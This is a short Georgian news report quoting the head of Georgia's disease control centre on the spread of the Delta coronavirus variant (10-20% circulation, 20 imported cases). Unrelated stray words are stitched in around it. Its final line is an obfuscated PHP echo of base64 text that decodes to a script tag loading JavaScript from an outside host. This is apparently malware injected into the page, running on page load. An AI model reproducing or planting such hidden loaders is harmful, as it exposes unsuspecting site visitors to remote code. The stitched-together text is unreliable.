celsiusi
ავერსი საქკაბელი
დაავადებათა კონტროლის ეროვნული ცენტრის ხელმძღვანელ ამირან გამყრელიძის ინფორმაციით, საქართველოში კორონავირუსის „დელტა“ [ე.წ. ინდური] შტამის ცირკულირება 20%-მდე აღწევს. განცხადება მან დღეს გააკეთა.
 
„სულ ლუგარის ლაბორატორიაში დადასტურებულია „დელტა“ შტამის 20 შემთხვევა, ყველა მათგანი იყო იმპორტირებული. ჩვენ ვანგარიშობთ, რომ, დაახლოებით, "დელტა შტამის“ ცირკულაცია თანდათან იზრდება და 10%-დან 20%-მდე მერყეობს.
 
ევროპის ქვეყნებში ის ანაცვლებს ბრიტანულ შტამს და მოსალოდნელია, რომ გარკვეული პერიოდის განმავლობაში ეს აქაც მოხდეს, ამიტომ შესაბამისი პრევენციული ღონისძიებები არის დასაცავი“, - განაცხადა გამყრელიძემ.
1119
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");